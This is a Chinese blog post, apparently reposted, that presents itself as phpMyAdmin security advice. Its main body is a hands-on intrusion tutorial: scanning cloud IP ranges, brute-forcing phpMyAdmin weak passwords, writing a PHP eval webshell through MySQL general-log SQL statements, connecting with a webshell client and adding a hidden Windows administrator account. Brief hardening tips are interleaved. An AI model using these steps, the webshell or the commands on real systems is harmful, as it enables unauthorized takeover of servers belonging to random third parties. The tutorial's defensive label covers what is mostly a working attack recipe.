phpmyadmin安全预防

头疼的安全

以前服务器老是本人黑,千疮百孔,只能一步步的去作一些安全防范,如何防范天然先从如何渗透开始.php

文章及建议

前段时间看到了个phpmyadmin提权的教程,不少人都说如今那里还有root账号root密码这种弱口令,今天给你们来一套完整的教学。html

首先百度XX云X地区的IP段(你要是连几个国内云服务运营商的名字都不知道,那我就真的没办法了)。mysql

phpmyadmin从找目标到拿下服务器

找到之后百度随便找个工具扫描IP段,大的运营商通常直接后两个大段都是他的git

而后找到IP段之后直接找一个80端口批量扫描的工具扫80端口,直接扫两个大段github

我用的这个叫S-Xing,百度来的,不知道有没有后门,因此就不提供了sql

phpmyadmin从找目标到拿下服务器

phpmyadmin从找目标到拿下服务器

扫描好之后导入刚才扫描好的IP数据库

phpmyadmin从找目标到拿下服务器

而后选择自动后缀安全

phpmyadmin从找目标到拿下服务器

线程根据本身配置来配置,我直接选择最高500,而后开始爆破服务器

phpmyadmin从找目标到拿下服务器

爆破结果工具

phpmyadmin从找目标到拿下服务器

防范建议
这里的话,想要防范这一步,能够采起的方法有关闭phpMyAdmin,这个最直接了.
若是不关闭的话,建议更改访问的端口号.
而后默认密码必须修改,不可使用简单密码.
目录的权限也最好降低到最低.

随便选择一个开搞

先看一下服务器信息xx.xx.xx.xx/l.php

phpmyadmin从找目标到拿下服务器

网站路径什么的都爆出来了,登陆后台

phpmyadmin从找目标到拿下服务器

老规矩,查下mysql日志文件路径

phpmyadmin从找目标到拿下服务器

先修改日志路径到当前网站路径,在开启日志,并插入一句话木马,而后关闭日志

SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/sean.php';

修改当前日志文件到网站目录下

set global general_log = "ON"; 开启mysql记录日志

select '<?php eval($_POST[sean]);?>'; 插入PHP 一句话木马

set global general_log = "OFF"; 关闭mysql记录日志

phpmyadmin从找目标到拿下服务器

执行成功

phpmyadmin从找目标到拿下服务器

接下来上菜刀链接上传好的一句话木马

phpmyadmin从找目标到拿下服务器

phpmyadmin从找目标到拿下服务器

net user admin$ sean2018.. /add & net localgroup administrators admin$ /add建立一个管理员帐号

phpmyadmin从找目标到拿下服务器

帐号已存在,那就直接修改密码了,带$符号的都是被影藏帐号,估计被日了多少次了吧

phpmyadmin从找目标到拿下服务器

接下来链接试试

phpmyadmin从找目标到拿下服务器

phpmyadmin从找目标到拿下服务器

防范建议
在这一步的话,防范的方法也有一些,比方说加一个安全狗软件,算是不错的了.
至于写文件的这个权限,刚刚若是下降了,应该问题不大,不过也有能够提高权限的一些工具,所以须要及时更新数据库和系统的bug.
至于执行命令建立用户的权限,只能简单作好预防和按期查看了,基本上到了上一步,全部的权限和帐户已经有了.到了这里目前只有重装系统,才能干掉这个入侵者的份了.
固然,若是把全部的漏洞堵上,也能够不重装.可是后门太多,非专业人员,处理不会怎么全面.

玩完,收工,文章内全部的工具,百度一搜索一大把,我也是百度来的,不知道有没有后门因此就不提供下载了,怕中毒找个虚拟机搞,本身折腾吧。

华盟网原创,随便转载但请注明来自77169.COM,感谢支持!

本文章只作教学思路,请勿用于非法用途

说明

欢迎评论,欢迎指正,转载也请注明出处.

参考文章

phpmyadmin从找目标到拿下服务器

版本说明

20180806 开始着手文章

20180807 文章完成时间

相关文章
相关标签/搜索